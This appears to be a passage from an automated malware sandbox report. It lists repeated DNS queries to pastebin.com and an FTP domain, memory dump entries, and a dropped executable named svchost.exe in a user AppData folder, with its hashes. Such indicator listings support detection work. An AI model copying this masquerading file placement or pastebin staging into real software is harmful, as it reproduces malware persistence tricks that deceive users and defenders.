US 8.8.8.8:53 ftp.encompossoftware.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp

Files

memory/2684-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

memory/2684-1-0x0000023AD3860000-0x0000023AD38A2000-memory.dmp

memory/2684-2-0x00007FF830B90000-0x00007FF831652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdnl1i0o.vjo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4664-5-0x000002279E540000-0x000002279E562000-memory.dmp

memory/4664-12-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-13-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-14-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-15-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-18-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/2684-20-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

memory/2684-21-0x00007FF830B90000-0x00007FF831652000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 16deda7a7a2e8f354fbff30ad723a711
SHA1 8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512 6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

memory/2684-33-0x00007FF830B90000-0x00007FF831652000-memory.dmp